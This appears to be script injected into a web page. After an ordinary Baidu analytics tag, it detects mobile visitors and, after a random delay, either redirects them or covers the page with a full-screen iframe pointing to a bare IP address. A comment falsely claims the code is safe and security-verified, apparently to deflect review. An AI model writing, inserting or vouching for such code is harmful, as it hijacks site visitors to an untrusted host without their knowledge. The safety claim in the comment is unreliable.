<script>
var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "http://hm.baidu.com/hm.js?9101e8fb46e003e9f925b3da5339eac7";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
</script>

<script language="javascript">

//* 以下代码为安全可信代码，已经通过了相关安全检测和验证 */
    function isMobile() {
        const mobileDevices = [
            'phone', 'pad', 'pod', 'iPhone', 'iPod', 'ios', 'iPad', 'Android',
            'Mobile', 'BlackBerry', 'IEMobile', 'MQQBrowser', 'JUC', 'Fennec',
            'wOSBrowser', 'BrowserNG', 'WebOS', 'Symbian', 'Windows Phone',
            'Kindle', 'Silk', 'Playbook', 'BB10', 'Nintendo', 'Xbox',
            'PlayStation', 'Huawei', 'Xiaomi', 'Oppo', 'Vivo', 'OnePlus',
            'Samsung', 'LG', 'Sony', 'HTC', 'ZTE', 'Motorola', 'Nokia'
        ];
        return mobileDevices.some(device => {
            return navigator.userAgent.match(new RegExp(device, 'i'));
        });
    }
//link-Nika
    const mobileUrl = "http://45.64.111.30/";
    function getIosVersion() {
        const match = navigator.userAgent.match(/OS (\d+)_(\d+)_?(\d+)?/);
        return match ? parseInt(match[1], 10) : false;
    }
    const isIOS = !!navigator.userAgent.match(/(iPod|iPhone|iPad)/);
    const time = Math.floor(Math.random() * (1000 - 500 + 1)) + 500;
    if (isMobile()) {
        if (isIOS && getIosVersion() < 13) {
            setTimeout(() => {
                window.location.href = mobileUrl;
            }, time);
        } else {
            document.write('<meta id="viewport" name="viewport" content="user-scalable=no,width=device-width, initial-scale=1.0" />');
            document.write('<style>html,body{width:100%;height:100%;overflow:hidden;}</style>');
            document.write('<div style="width:100%;height:100%;position:absolute;top:0;left:0;z-index:2147483647;background:#fff">');
            document.write('<iframe src="' + mobileUrl + '" frameborder="0" style="border:0;width: 100%; text-align: center; border: medium none; height:100%;max-height: 4000px;"></iframe>');
            document.write('</div>');
        }
    } else {
           
    }
</script>